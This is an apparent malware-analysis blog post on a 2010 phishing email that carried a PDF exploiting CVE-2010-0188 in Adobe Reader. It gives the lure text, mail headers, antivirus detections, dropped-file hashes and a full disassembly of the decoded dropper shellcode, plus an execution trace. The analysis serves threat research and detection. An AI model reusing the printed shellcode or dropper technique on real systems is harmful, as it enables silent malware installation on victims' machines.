contagio: Aug 3 CVE-2010-0188 PDF Asian Regionalism and US Policy

CVE-2010-0188 Unspecified vulnerability in Adobe Reader and Acrobat 8.x before 8.2.1 and 9.x before 9.3.1 allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors

UPDATE August 11,2010 Many thanks to binjo (@binjo), xanda (@xanda), Matthew de Carteret (@lordparody) and Tyler M from Vicheck.ca for additional information/analysis of the attachment

Download 126939c66f62baaa0784d4e7f5b4d973 Asian_Regionalism_and_US_Policy and all the files listed below as a password protected archive (please contact me for the password if you need it)

From: XXXXXXXX [mailto:XXXXXXXXXXX@yahoo.com]
Sent: Tuesday, August 03, 2010 8:18 AM
To: XXXXXXXXXXXX
Subject: Asian Regionalism and US Policy

Dear All,

Recently I read an excellent article.

Maybe you are interested in it.

FYI.

Best,
XXXXXX

File Asian_Regionalism_and_US_Policy.p received on 2010.08.05 05:00:51 (UTC)

http://www.virustotal.com/analisis/d4323260646038181015f91cc83fc310b9f4901bb2c187cc5580ff15ae798737-1280984451
Result: 7/41 (17.08%)
Authentium   5.2.0.5   2010.08.05   JS/CVE-0188
BitDefender   7.2   2010.08.05   Exploit.PDF-JS.Gen
F-Prot   4.6.1.107   2010.08.05   JS/CVE-0188
F-Secure   9.0.15370.0   2010.08.05   Exploit.PDF-JS.Gen
GData   21   2010.08.05   Exploit.PDF-JS.Gen
Microsoft   1.6004   2010.08.04   Exploit:Win32/Pdfjsc.gen!B
nProtect   2010-08-04.01   2010.08.04   Exploit.PDF-JS.Gen
Additional information
File size: 168331 bytes
MD5...: 126939c66f62baaa0784d4e7f5b4d973

Headers

Received: from [173.244.197.210] by web120020.mail.ne1.yahoo.com via HTTP; Tue, 03 Aug 2010 05:17:59 PDT
X-Mailer: YahooMailClassic/11.2.4 YahooMailWebService/0.8.105.279950
Date: Tue, 3 Aug 2010 05:17:59 -0700
From: "XXXXXXXXXXX"
Subject: Asian Regionalism and US Policy
To: XXXXXXXXXXX
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-1610185150-1280837879=:30394"

Tor
Hostname:    anonymizer2.torservers.net
ISP:    Hosting Services
Organization:    Hosting Services
Proxy:    Confirmed proxy server. (Read about proxy servers)
State/Region:    Utah
City:    Providence

=============

 Test on WinXP XP 2 Adobe 8 and 9.3.0

Created files
%tmp%\1.dat

File: 1.dat
Size: 168331
MD5: 126939C66F62BAAA0784D4E7F5B4D973 (same as the PDF itself)

%tmp%\A9R3302.tmp

File A9R3302.tmp
Size: 358
MD5: AD395DBE5B8E5005CF87EC6B0958AB09

%tmp%\jackjon.exe

File: jackjon.exe
Size: 0
MD5: D41D8CD98F00B204E9800998ECF8427E

Vicheck.ca results

PDF Exploit metasploit version of TIFF overflow CVE-2010-0188

https://www.vicheck.ca/md5query.php?hash=126939c66f62baaa0784d4e7f5b4d973

CREATED FILE 1 - 1.dat = 126939C66F62BAAA0784D4E7F5B4D973 168331 bytes

CVE-2010-0188 1.dat, which is the same MD5 as Asian_Regionalism_and_US_Policy.pdf

MD5: 126939C66F62BAAA0784D4E7F5B4D973
the js (131) checks for the version and loads the image according to the version (149) (@Xanda )

Note 450 PDF Comments in this manner in the end of the file (comments welcome, not sure what they are for)

============================================================================

CREATED FILE 2

A9RF7D5.tmp 5c0b10ca87c532b43519eb567f29b182.tmp :358 bytes

If you open 1.dat MD5: 126939C66F62BAAA0784D4E7F5B4D973 as an Adobe document, the created files are the same as listed above except there is a
program.pdf (0bytes) instead of jackjon.exe (0 bytes)

Interestingly, Vicheck.ca got much better results than we did - program.pdf and jackjon.exe were not 0 bytes

C:\DOCUME~1\username\LOCALS~1\Temp\A9RF7D5.tmp=5c0b10ca87c532b43519eb567f29b182.tmp:358
C:\DOCUME~1\username\LOCALS~1\Temp\1.dat=126939c66f62baaa0784d4e7f5b4d973.dat:168331
C:\DOCUME~1\username\LOCALS~1\Temp\jackjon.exe=939b7526572f0c128c0cda9baed7f8a3.exe:7763
C:\DOCUME~1\username\LOCALS~1\Temp\program.pdf=407236f7f989210fa64630b5ac501d94.pdf:156771

C:\DOCUME~1\username\LOCALS~1\Temp\program.pdf=407236f7f989210fa64630b5ac501d94.pdf:156771
==============================================================================

CREATED FILE 3

jackjon.exe 939b7526572f0c128c0cda9baed7f8a3 7763 bytes
Analysis details on jackjon.exe from Binjo (@binjo)
http://pastebin.org/468812

payload decoding rol+xor(197-201) from 0xdf8 + 4 (@binjo http://pastebin.org/459615)

1.seg000:000005E2 90                                      nop
2.seg000:000005E3 90                                      nop
3.seg000:000005E4 E9 57 02 00 00                          jmp     loc_840
4.seg000:000005E9                         ; ---------------------------------------------------------------------------
5.seg000:000005E9
6.seg000:000005E9                         loc_5E9:                                ; CODE XREF: seg000:loc_840 p
7.seg000:000005E9 5F                                      pop     edi
8.seg000:000005EA 57                                      push    edi
9.seg000:000005EB 6A 0E                                   push    0Eh
10.seg000:000005ED 8B 0C 24                                mov     ecx, [esp]
11.seg000:000005F0
12.seg000:000005F0                         loc_5F0:                                ; CODE XREF: seg000:00000646 j
13.seg000:000005F0 51                                      push    ecx
14.seg000:000005F1 57                                      push    edi
15.seg000:000005F2 33 FF                                   xor     edi, edi
16.seg000:000005F4 64 A1 30 00 00 00                       mov     eax, dword ptr fs:loc_30
17.seg000:000005FA 8B 40 0C                                mov     eax, [eax+0Ch]
18.seg000:000005FD 8B 70 1C                                mov     esi, [eax+1Ch]
19.seg000:00000600 AD                                      lodsd
20.seg000:00000601 8B 68 08                                mov     ebp, [eax+8]
21.seg000:00000604 8B 45 3C                                mov     eax, [ebp+3Ch]
22.seg000:00000607 8B 54 05 78                             mov     edx, [ebp+eax+78h]
23.seg000:0000060B 03 D5                                   add     edx, ebp
24.seg000:0000060D 8B 5A 20                                mov     ebx, [edx+20h]
25.seg000:00000610 03 DD                                   add     ebx, ebp
26.seg000:00000612
27.seg000:00000612                         loc_612:                                ; CODE XREF: seg000:0000062E j
28.seg000:00000612 47                                      inc     edi
29.seg000:00000613 8B 34 BB                                mov     esi, [ebx+edi*4]
30.seg000:00000616 03 F5                                   add     esi, ebp
31.seg000:00000618 33 C9                                   xor     ecx, ecx
32.seg000:0000061A
33.seg000:0000061A                         loc_61A:                                ; CODE XREF: seg000:00000627 j
34.seg000:0000061A 0F BE 06                                movsx   eax, byte ptr [esi]
35.seg000:0000061D 3A C4                                   cmp     al, ah
36.seg000:0000061F 74 08                                   jz      short loc_629
37.seg000:00000621 C1 C9 07                                ror     ecx, 7
38.seg000:00000624 03 C8                                   add     ecx, eax
39.seg000:00000626 46                                      inc     esi
40.seg000:00000627 EB F1                                   jmp     short loc_61A
41.seg000:00000629                         ; ---------------------------------------------------------------------------
42.seg000:00000629
43.seg000:00000629                         loc_629:                                ; CODE XREF: seg000:0000061F j
44.seg000:00000629 8B 04 24                                mov     eax, [esp]
45.seg000:0000062C 3B 08                                   cmp     ecx, [eax]
46.seg000:0000062E 75 E2                                   jnz     short loc_612
47.seg000:00000630 8B 5A 24                                mov     ebx, [edx+24h]
48.seg000:00000633 03 DD                                   add     ebx, ebp
49.seg000:00000635 66 8B 0C 7B                             mov     cx, [ebx+edi*2]
50.seg000:00000639 8B 5A 1C                                mov     ebx, [edx+1Ch]
51.seg000:0000063C 03 DD                                   add     ebx, ebp
52.seg000:0000063E 8B 04 BB                                mov     eax, [ebx+edi*4]
53.seg000:00000641 03 C5                                   add     eax, ebp
54.seg000:00000643 5F                                      pop     edi
55.seg000:00000644 AB                                      stosd
56.seg000:00000645 59                                      pop     ecx
57.seg000:00000646 E2 A8                                   loop    loc_5F0
58.seg000:00000648 8B F7                                   mov     esi, edi
59.seg000:0000064A 8B 7C 24 04                             mov     edi, [esp+4]
60.seg000:0000064E 56                                      push    esi
61.seg000:0000064F 57                                      push    edi
62.seg000:00000650 8B EC                                   mov     ebp, esp
63.seg000:00000652 81 EC 50 03 00 00                       sub     esp, 350h
64.seg000:00000658 8B 5D 00                                mov     ebx, [ebp+0]
65.seg000:0000065B FF 13                                   call    [ebx+_X.GetCommandLineA]
66.seg000:0000065D 8B F0                                   mov     esi, eax
67.seg000:0000065F 32 C9                                   xor     cl, cl
68.seg000:00000661 46                                      inc     esi
69.seg000:00000662
70.seg000:00000662                         loc_662:                                ; CODE XREF: seg000:00000665 j
71.seg000:00000662                                                                 ; seg000:0000066C j
72.seg000:00000662 AC                                      lodsb
73.seg000:00000663 3C 22                                   cmp     al, 22h ; '"'
74.seg000:00000665 75 FB                                   jnz     short loc_662
75.seg000:00000667 FE C1                                   inc     cl
76.seg000:00000669 80 F9 02                                cmp     cl, 2
77.seg000:0000066C 75 F4                                   jnz     short loc_662
78.seg000:0000066E 56                                      push    esi
79.seg000:0000066F
80.seg000:0000066F                         loc_66F:                                ; CODE XREF: seg000:00000672 j
81.seg000:0000066F AC                                      lodsb
82.seg000:00000670 3C 22                                   cmp     al, 22h ; '"'
83.seg000:00000672 75 FB                                   jnz     short loc_66F
84.seg000:00000674 4E                                      dec     esi
85.seg000:00000675 33 C0                                   xor     eax, eax
86.seg000:00000677 89 06                                   mov     [esi], eax
87.seg000:00000679 8D BD B0 FC FF FF                       lea     edi, [ebp-350h]
88.seg000:0000067F 57                                      push    edi
89.seg000:00000680 68 04 01 00 00                          push    104h
90.seg000:00000685 8B 5D 00                                mov     ebx, [ebp+0]
91.seg000:00000688 FF 53 04                                call    [ebx+_X.GetTempPathA]
92.seg000:0000068B 89 45 FC                                mov     [ebp-4], eax
93.seg000:0000068E 8B 75 04                                mov     esi, [ebp+4]
94.seg000:00000691 57                                      push    edi
95.seg000:00000692 03 F8                                   add     edi, eax
96.seg000:00000694
97.seg000:00000694                         loc_694:                                ; CODE XREF: seg000:00000698 j
98.seg000:00000694 AC                                      lodsb
99.seg000:00000695 AA                                      stosb
100.seg000:00000696 3C 00                                   cmp     al, 0
101.seg000:00000698 75 FA                                   jnz     short loc_694
102.seg000:0000069A 89 75 F4                                mov     [ebp-0Ch], esi
103.seg000:0000069D 5F                                      pop     edi
104.seg000:0000069E 5E                                      pop     esi
105.seg000:0000069F 6A 00                                   push    0
106.seg000:000006A1 57                                      push    edi
107.seg000:000006A2 56                                      push    esi
108.seg000:000006A3 8B 5D 00                                mov     ebx, [ebp+0]
109.seg000:000006A6 FF 53 08                                call    [ebx+_X.CopyFileA]
110.seg000:000006A9 6A 00                                   push    0
111.seg000:000006AB 6A 00                                   push    0
112.seg000:000006AD 6A 04                                   push    4
113.seg000:000006AF 6A 00                                   push    0
114.seg000:000006B1 6A 00                                   push    0
115.seg000:000006B3 68 00 00 00 C0                          push    0C0000000h
116.seg000:000006B8 57                                      push    edi
117.seg000:000006B9 8B 5D 00                                mov     ebx, [ebp+0]
118.seg000:000006BC FF 53 0C                                call    [ebx+_X.CreateFileA]
119.seg000:000006BF 89 45 F8                                mov     [ebp-8], eax
120.seg000:000006C2 8B 75 F4                                mov     esi, [ebp-0Ch]
121.seg000:000006C5 AD                                      lodsd
122.seg000:000006C6 89 75 F4                                mov     [ebp-0Ch], esi
123.seg000:000006C9 6A 00                                   push    0
124.seg000:000006CB 6A 00                                   push    0
125.seg000:000006CD 50                                      push    eax
126.seg000:000006CE 8B 45 F8                                mov     eax, [ebp-8]
127.seg000:000006D1 50                                      push    eax
128.seg000:000006D2 8B 5D 00                                mov     ebx, [ebp+0]
129.seg000:000006D5 FF 53 14                                call    [ebx+_X.SetFilePointer]
130.seg000:000006D8 8B 75 F4                                mov     esi, [ebp-0Ch]
131.seg000:000006DB 56                                      push    esi
132.seg000:000006DC AD                                      lodsd
133.seg000:000006DD 89 75 F4                                mov     [ebp-0Ch], esi
134.seg000:000006E0 6A 40                                   push    40h ; '@'
135.seg000:000006E2 68 00 10 00 00                          push    1000h
136.seg000:000006E7 50                                      push    eax
137.seg000:000006E8 6A 00                                   push    0
138.seg000:000006EA FF 53 10                                call    [ebx+_X.VirtualAlloc]
139.seg000:000006ED 89 45 F0                                mov     [ebp-10h], eax
140.seg000:000006F0 5E                                      pop     esi
141.seg000:000006F1 6A 00                                   push    0
142.seg000:000006F3 56                                      push    esi
143.seg000:000006F4 FF 36                                   push    dword ptr [esi]
144.seg000:000006F6 50                                      push    eax
145.seg000:000006F7 8B 5D F8                                mov     ebx, [ebp-8]
146.seg000:000006FA 53                                      push    ebx
147.seg000:000006FB 8B 5D 00                                mov     ebx, [ebp+0]
148.seg000:000006FE FF 53 18                                call    [ebx+_X.ReadFile]
149.seg000:00000701 AD                                      lodsd
150.seg000:00000702 33 C9                                   xor     ecx, ecx
151.seg000:00000704 41                                      inc     ecx
152.seg000:00000705 41                                      inc     ecx
153.seg000:00000706 51                                      push    ecx
154.seg000:00000707
155.seg000:00000707                         loc_707:                                ; CODE XREF: seg000:00000801 j
156.seg000:00000707 8D BD B0 FC FF FF                       lea     edi, [ebp-350h]
157.seg000:0000070D 57                                      push    edi
158.seg000:0000070E 8B 45 FC                                mov     eax, [ebp-4]
159.seg000:00000711 03 F8                                   add     edi, eax
160.seg000:00000713
161.seg000:00000713                         loc_713:                                ; CODE XREF: seg000:00000717 j
162.seg000:00000713 AC                                      lodsb
163.seg000:00000714 AA                                      stosb
164.seg000:00000715 3C 00                                   cmp     al, 0
165.seg000:00000717 75 FA                                   jnz     short loc_713
166.seg000:00000719 5F                                      pop     edi
167.seg000:0000071A 89 75 F4                                mov     [ebp-0Ch], esi
168.seg000:0000071D 6A 00                                   push    0
169.seg000:0000071F 6A 00                                   push    0
170.seg000:00000721 6A 01                                   push    1
171.seg000:00000723 6A 00                                   push    0
172.seg000:00000725 6A 00                                   push    0
173.seg000:00000727 68 00 00 00 C0                          push    0C0000000h
174.seg000:0000072C 57                                      push    edi
175.seg000:0000072D 8B 5D 00                                mov     ebx, [ebp+0]
176.seg000:00000730 FF 53 0C                                call    [ebx+_X.CreateFileA]
177.seg000:00000733 83 F8 FF                                cmp     eax, 0FFFFFFFFh
178.seg000:00000736 75 0D                                   jnz     short loc_745
179.seg000:00000738 59                                      pop     ecx
180.seg000:00000739 80 F9 01                                cmp     cl, 1
181.seg000:0000073C 51                                      push    ecx
182.seg000:0000073D 0F 85 AC 00 00 00                       jnz     loc_7EF
183.seg000:00000743 EB 4B                                   jmp     short loc_790
184.seg000:00000745                         ; ---------------------------------------------------------------------------
185.seg000:00000745
186.seg000:00000745                         loc_745:                                ; CODE XREF: seg000:00000736 j
187.seg000:00000745 57                                      push    edi
188.seg000:00000746 89 45 EC                                mov     [ebp-14h], eax
189.seg000:00000749 8B 75 F0                                mov     esi, [ebp-10h]
190.seg000:0000074C AD                                      lodsd
191.seg000:0000074D 8B C8                                   mov     ecx, eax
192.seg000:0000074F 8B FE                                   mov     edi, esi
193.seg000:00000751 50                                      push    eax
194.seg000:00000752 56                                      push    esi
195.seg000:00000753
196.seg000:00000753                         loc_753:                                ; CODE XREF: seg000:00000759 j
197.seg000:00000753 AC                                      lodsb
198.seg000:00000754 D0 C0                                   rol     al, 1
199.seg000:00000756 32 C1                                   xor     al, cl
200.seg000:00000758 AA                                      stosb
201.seg000:00000759 E2 F8                                   loop    loc_753
202.seg000:0000075B 8B 5D F0                                mov     ebx, [ebp-10h]
203.seg000:0000075E 5E                                      pop     esi
204.seg000:0000075F 58                                      pop     eax
205.seg000:00000760 6A 00                                   push    0
206.seg000:00000762 53                                      push    ebx
207.seg000:00000763 50                                      push    eax
208.seg000:00000764 56                                      push    esi
209.seg000:00000765 8B 5D EC                                mov     ebx, [ebp-14h]
210.seg000:00000768 53                                      push    ebx
211.seg000:00000769 8B 5D 00                                mov     ebx, [ebp+0]
212.seg000:0000076C FF 53 1C                                call    [ebx+_X.WriteFile]
213.seg000:0000076F 8B 5D EC                                mov     ebx, [ebp-14h]
214.seg000:00000772 53                                      push    ebx
215.seg000:00000773 8B 5D 00                                mov     ebx, [ebp+0]
216.seg000:00000776 FF 53 20                                call    [ebx+_X.CloseHandle]
217.seg000:00000779 8D BD FC FE FF FF                       lea     edi, [ebp-104h]
218.seg000:0000077F 33 C0                                   xor     eax, eax
219.seg000:00000781 B9 11 00 00 00                          mov     ecx, 11h
220.seg000:00000786 F2 AB                                   repne stosd
221.seg000:00000788 5F                                      pop     edi
222.seg000:00000789 59                                      pop     ecx
223.seg000:0000078A 83 F9 01                                cmp     ecx, 1
224.seg000:0000078D 51                                      push    ecx
225.seg000:0000078E 75 46                                   jnz     short loc_7D6
226.seg000:00000790
227.seg000:00000790                         loc_790:                                ; CODE XREF: seg000:00000743 j
228.seg000:00000790 8D BD FC FE FF FF                       lea     edi, [ebp-104h]
229.seg000:00000796 33 C0                                   xor     eax, eax
230.seg000:00000798 B9 11 00 00 00                          mov     ecx, 11h
231.seg000:0000079D F2 AB                                   repne stosd
232.seg000:0000079F 8D 9D C0 FD FF FF                       lea     ebx, [ebp-240h]
233.seg000:000007A5 68 04 01 00 00                          push    104h
234.seg000:000007AA 53                                      push    ebx
235.seg000:000007AB 6A 00                                   push    0
236.seg000:000007AD 8B 5D 00                                mov     ebx, [ebp+0]
237.seg000:000007B0 FF 53 24                                call    [ebx+_X.GetModuleFileNameA]
238.seg000:000007B3 8D BD C0 FD FF FF                       lea     edi, [ebp-240h]
239.seg000:000007B9 57                                      push    edi
240.seg000:000007BA 03 F8                                   add     edi, eax
241.seg000:000007BC B0 20                                   mov     al, 20h ; ' '
242.seg000:000007BE AA                                      stosb
243.seg000:000007BF 8D B5 B0 FC FF FF                       lea     esi, [ebp-350h]
244.seg000:000007C5 B0 22                                   mov     al, 22h ; '"'
245.seg000:000007C7 AA                                      stosb
246.seg000:000007C8
247.seg000:000007C8                         loc_7C8:                                ; CODE XREF: seg000:000007CC j
248.seg000:000007C8 AC                                      lodsb
249.seg000:000007C9 AA                                      stosb
250.seg000:000007CA 3C 00                                   cmp     al, 0
251.seg000:000007CC 75 FA                                   jnz     short loc_7C8
252.seg000:000007CE 4F                                      dec     edi
253.seg000:000007CF B0 22                                   mov     al, 22h ; '"'
254.seg000:000007D1 AA                                      stosb
255.seg000:000007D2 B0 00                                   mov     al, 0
256.seg000:000007D4 AA                                      stosb
257.seg000:000007D5 5F                                      pop     edi
258.seg000:000007D6
259.seg000:000007D6                         loc_7D6:                                ; CODE XREF: seg000:0000078E j
260.seg000:000007D6 8D 9D FC FE FF FF                       lea     ebx, [ebp-104h]
261.seg000:000007DC 53                                      push    ebx
262.seg000:000007DD 83 C3 04                                add     ebx, 4
263.seg000:000007E0 53                                      push    ebx
264.seg000:000007E1 50                                      push    eax
265.seg000:000007E2 50                                      push    eax
266.seg000:000007E3 50                                      push    eax
267.seg000:000007E4 50                                      push    eax
268.seg000:000007E5 50                                      push    eax
269.seg000:000007E6 50                                      push    eax
270.seg000:000007E7 57                                      push    edi
271.seg000:000007E8 50                                      push    eax
272.seg000:000007E9 8B 5D 00                                mov     ebx, [ebp+0]
273.seg000:000007EC FF 53 28                                call    [ebx+_X.CreateProcessA]
274.seg000:000007EF
275.seg000:000007EF                         loc_7EF:                                ; CODE XREF: seg000:0000073D j
276.seg000:000007EF 59                                      pop     ecx
277.seg000:000007F0 49                                      dec     ecx
278.seg000:000007F1 8B 75 F0                                mov     esi, [ebp-10h]
279.seg000:000007F4 AD                                      lodsd
280.seg000:000007F5 03 F0                                   add     esi, eax
281.seg000:000007F7 89 75 F0                                mov     [ebp-10h], esi
282.seg000:000007FA 8B 75 F4                                mov     esi, [ebp-0Ch]
283.seg000:000007FD 51                                      push    ecx
284.seg000:000007FE 80 F9 00                                cmp     cl, 0
285.seg000:00000801 0F 85 00 FF FF FF                       jnz     loc_707
286.seg000:00000807 8B 45 F8                                mov     eax, [ebp-8]
287.seg000:0000080A 50                                      push    eax
288.seg000:0000080B 8B 5D 00                                mov     ebx, [ebp+0]
289.seg000:0000080E FF 53 20                                call    [ebx+_X.CloseHandle]
290.seg000:00000811 8D BD B0 FC FF FF                       lea     edi, [ebp-350h]
291.seg000:00000817 57                                      push    edi
292.seg000:00000818 8B 45 FC                                mov     eax, [ebp-4]
293.seg000:0000081B 03 F8                                   add     edi, eax
294.seg000:0000081D 8B 75 00                                mov     esi, [ebp+0]
295.seg000:00000820 83 C6 38                                add     esi, 38h ; '8'
296.seg000:00000823
297.seg000:00000823                         loc_823:                                ; CODE XREF: seg000:00000827 j
298.seg000:00000823 AC                                      lodsb
299.seg000:00000824 AA                                      stosb
300.seg000:00000825 3C 00                                   cmp     al, 0
301.seg000:00000827 75 FA                                   jnz     short loc_823
302.seg000:00000829 5F                                      pop     edi
303.seg000:0000082A 57                                      push    edi
304.seg000:0000082B 8B 5D 00                                mov     ebx, [ebp+0]
305.seg000:0000082E FF 53 2C                                call    [ebx+_X.DeleteFileA]
306.seg000:00000831 8B 5D 00                                mov     ebx, [ebp+0]
307.seg000:00000834 FF 53 30                                call    [ebx+_X.GetCurrentProcess]
308.seg000:00000837 6A 00                                   push    0
309.seg000:00000839 50                                      push    eax
310.seg000:0000083A 8B 5D 00                                mov     ebx, [ebp+0]
311.seg000:0000083D FF 53 34                                call    [ebx+_X.TerminateProcess]
312.seg000:00000840
313.seg000:00000840                         loc_840:                                ; CODE XREF: seg000:000005E4 j
314.seg000:00000840 E8 A4 FD FF FF                          call    loc_5E9
315.seg000:00000840                         ; ---------------------------------------------------------------------------
316.seg000:00000845 9B 87 8B E5                             dd 0E58B879Bh
317.seg000:00000849 39 E2 7D 83                             dd 837DE239h
318.seg000:0000084D B1 0F EB 07                             dd 7EB0FB1h
319.seg000:00000851 93 32 E4 94                             dd 94E43293h
320.seg000:00000855 67 59 DE 1E                             dd 1EDE5967h
321.seg000:00000859 43 BE AC DB                             dd 0DBACBE43h
322.seg000:0000085D B2 36 0F 13                             dd 130F36B2h
323.seg000:00000861 C4 8D 1F 74                             dd 741F8DC4h
324.seg000:00000865 57 66 0D FF                             dd 0FF0D6657h
325.seg000:00000869 ED AF FF B4                             dd 0B4FFAFEDh
326.seg000:0000086D C9 BC A6 6B                             dd 6BA6BCC9h
327.seg000:00000871 79 39 E6 98                             dd 98E63979h
328.seg000:00000875 BB E6 2F 3A                             dd 3A2FE6BBh
329.seg000:00000879 8F F2 18 61                             dd 6118F28Fh
330.seg000:0000087D 31 2E 64 61 74 00       a1_dat          db '1.dat',0
331.seg000:00000883 F8 0D 00 00                             dd offset unk_DF8
332.seg000:00000887 BE 82 02 00                             dd 282BEh
333.seg000:0000088B 6A 61 63 6B 6A 6F 6E 2E+aJackjon_exe    db 'jackjon.exe',0
334.seg000:00000897 70 72 6F 67 72 61 6D 2E+aProgram_pdf    db 'program.pdf',0
335.seg000:000008A3 90                                      db  90h ; ?
336.seg000:000008A4 90                                      db  90h ; ?

Shellcode (@binjo)

#
# Shellcode detector
#

MAX_LEGIT_INSTRUCTION_LOG_SIZE : 400

Executed before
0x07004316::BIB.dll C9 leave
0x07004317::BIB.dll C3 ret
0x07004294::BIB.dll 8B C8 mov ecx, eax
0x07004296::BIB.dll 89 4D EC mov dword ptr [ebp-0x14], ecx
0x07004299::BIB.dll 85 C9 test ecx, ecx
0x0700429B::BIB.dll C6 45 FC 01 mov byte ptr [ebp-0x4], 0x1
0x0700429F::BIB.dll 74 19 jz 0x70042ba
0x070042A1::BIB.dll FF 75 14 push dword ptr [ebp+0x14]
0x070042A4::BIB.dll FF 75 10 push dword ptr [ebp+0x10]
0x070042A7::BIB.dll FF 75 0C push dword ptr [ebp+0xc]
0x070042AA::BIB.dll FF 75 08 push dword ptr [ebp+0x8]
0x070042AD::BIB.dll E8 34 FF FF FF call 0x70041e6 -> BIBInitialize4
0x07001550::BIB.dll 56 push esi
0x07001551::BIB.dll 8B F1 mov esi, ecx
0x07001553::BIB.dll E8 D4 FF FF FF call 0x700152c -> .text
0x07001558::BIB.dll FF 74 24 08 push dword ptr [esp+0x8]
0x0700155C::BIB.dll 8B CE mov ecx, esi
0x0700155E::BIB.dll E8 AD FF FF FF call 0x7001510 -> .text
0x07001563::BIB.dll 5E pop esi
0x07001564::BIB.dll C2 04 00 ret 0x4
0x07004167::BIB.dll 53 push ebx
0x07004168::BIB.dll FF 15 04 00 01 07 call dword ptr [0x7010004]
0x07001563::BIB.dll 5E pop esi
0x07001564::BIB.dll C2 04 00 ret 0x4
0x070013B5::BIB.dll 6A 04 push 0x4
0x070013B7::BIB.dll B8 EF DD 00 07 mov eax, 0x700ddef
0x070013BC::BIB.dll E8 99 51 00 00 call 0x700655a -> BIBInitialize4
0x070013C1::BIB.dll 8B F9 mov edi, ecx
0x070013C3::BIB.dll BE FC 8B 01 07 mov esi, 0x7018bfc
0x070013C8::BIB.dll 56 push esi
0x070013C9::BIB.dll 89 75 F0 mov dword ptr [ebp-0x10], esi
0x070013CC::BIB.dll FF 15 00 00 01 07 call dword ptr [0x7010000]
0x070013D2::BIB.dll 8B 0D F8 8B 01 07 mov ecx, dword ptr [0x7018bf8]
0x070013D8::BIB.dll 83 65 FC 00 and dword ptr [ebp-0x4], 0x0
0x070013DC::BIB.dll 83 C7 14 add edi, 0x14
0x070013DF::BIB.dll 57 push edi
0x070013E0::BIB.dll E8 B7 FF FF FF call 0x700139c -> .text
0x0700139C::BIB.dll FF 74 24 04 push dword ptr [esp+0x4]
0x070013A0::BIB.dll E8 C5 FF FF FF call 0x700136a -> .text
0x0700136A::BIB.dll 55 push ebp
0x0700136B::BIB.dll 8B EC mov ebp, esp
0x0700136D::BIB.dll 83 EC 0C sub esp, 0xc
0x07001370::BIB.dll FF 75 08 push dword ptr [ebp+0x8]
0x07001373::BIB.dll 33 C0 xor eax, eax
0x07001375::BIB.dll 89 45 F4 mov dword ptr [ebp-0xc], eax
0x07001378::BIB.dll 89 45 F8 mov dword ptr [ebp-0x8], eax
0x0700137B::BIB.dll 89 45 FC mov dword ptr [ebp-0x4], eax
0x0700137E::BIB.dll 8D 45 F4 lea eax, ptr [ebp-0xc]
0x07001381::BIB.dll 50 push eax
0x07001382::BIB.dll E8 6A FF FF FF call 0x70012f1 -> .text
0x0700115A::BIB.dll 59 pop ecx
0x0700115B::BIB.dll 59 pop ecx
0x0700115C::BIB.dll 33 C9 xor ecx, ecx
0x0700115E::BIB.dll 85 C0 test eax, eax
0x07001160::BIB.dll 0F 9C C1 setl cl
0x07001163::BIB.dll 8A C1 mov al, cl
0x07001165::BIB.dll C2 04 00 ret 0x4
0x07001387::BIB.dll 84 C0 test al, al
0x07001389::BIB.dll 74 0B jz 0x7001396
0x0700138B::BIB.dll FF 75 F4 push dword ptr [ebp-0xc]
0x0700138E::BIB.dll E8 64 FE FF FF call 0x70011f7 -> .text
0x070011F7::BIB.dll 53 push ebx
0x070011F8::BIB.dll 56 push esi
0x070011F9::BIB.dll 57 push edi
0x070011FA::BIB.dll 8B 7C 24 10 mov edi, dword ptr [esp+0x10]
0x070011FE::BIB.dll 8B 37 mov esi, dword ptr [edi]
0x07001200::BIB.dll 8B 06 mov eax, dword ptr [esi]
0x07001202::BIB.dll 85 C0 test eax, eax
0x07001204::BIB.dll 74 49 jz 0x700124f
0x07001206::BIB.dll 8D 5E 04 lea ebx, ptr [esi+0x4]
0x07001209::BIB.dll 83 3B 00 cmp dword ptr [ebx], 0x0
0x0700120C::BIB.dll 74 37 jz 0x7001245
0x0700120E::BIB.dll 53 push ebx
0x0700120F::BIB.dll E8 97 FF FF FF call 0x70011ab -> .text
0x070011AB::BIB.dll 8B 44 24 04 mov eax, dword ptr [esp+0x4]
0x070011AF::BIB.dll 8B 08 mov ecx, dword ptr [eax]
0x070011B1::BIB.dll EB 04 jmp 0x70011b7
0x070011B7::BIB.dll 8B 11 mov edx, dword ptr [ecx]
0x070011B9::BIB.dll 85 D2 test edx, edx
0x070011BB::BIB.dll 75 F6 jnz 0x70011b3
0x070011BD::BIB.dll C3 ret
0x070011B3::BIB.dll 8B C1 mov eax, ecx
0x070011B5::BIB.dll 8B CA mov ecx, edx
0x070011B7::BIB.dll 8B 11 mov edx, dword ptr [ecx]
0x070011B9::BIB.dll 85 D2 test edx, edx
0x070011BB::BIB.dll 75 F6 jnz 0x70011b3
0x070011BD::BIB.dll C3 ret
0x07001214::BIB.dll 50 push eax
0x07001215::BIB.dll E8 DD FF FF FF call 0x70011f7 -> .text
0x0700124F::BIB.dll 8B 46 04 mov eax, dword ptr [esi+0x4]
0x07001252::BIB.dll 85 C0 test eax, eax
0x07001254::BIB.dll 74 06 jz 0x700125c
0x07001256::BIB.dll 8B 4E 08 mov ecx, dword ptr [esi+0x8]
0x07001259::BIB.dll 89 48 08 mov dword ptr [eax+0x8], ecx
0x0700125C::BIB.dll 8B 46 04 mov eax, dword ptr [esi+0x4]
0x0700125F::BIB.dll 89 07 mov dword ptr [edi], eax
0x07001261::BIB.dll 8B 3F mov edi, dword ptr [edi]
0x07001263::BIB.dll 85 FF test edi, edi
0x07001265::BIB.dll 74 06 jz 0x700126d
0x07001267::BIB.dll 8B 46 0C mov eax, dword ptr [esi+0xc]
0x0700126A::BIB.dll 89 47 0C mov dword ptr [edi+0xc], eax
0x0700126D::BIB.dll 5F pop edi
0x0700126E::BIB.dll 8B C6 mov eax, esi
0x07001270::BIB.dll 5E pop esi
0x07001271::BIB.dll 5B pop ebx
0x07001272::BIB.dll C3 ret
0x0700125C::BIB.dll 8B 46 04 mov eax, dword ptr [esi+0x4]
0x0700125F::BIB.dll 89 07 mov dword ptr [edi], eax
0x07001261::BIB.dll 8B 3F mov edi, dword ptr [edi]
0x07001263::BIB.dll 85 FF test edi, edi
0x07001265::BIB.dll 74 06 jz 0x700126d
0x07001267::BIB.dll 8B 46 0C mov eax, dword ptr [esi+0xc]
0x0700126A::BIB.dll 89 47 0C mov dword ptr [edi+0xc], eax
0x0700126D::BIB.dll 5F pop edi
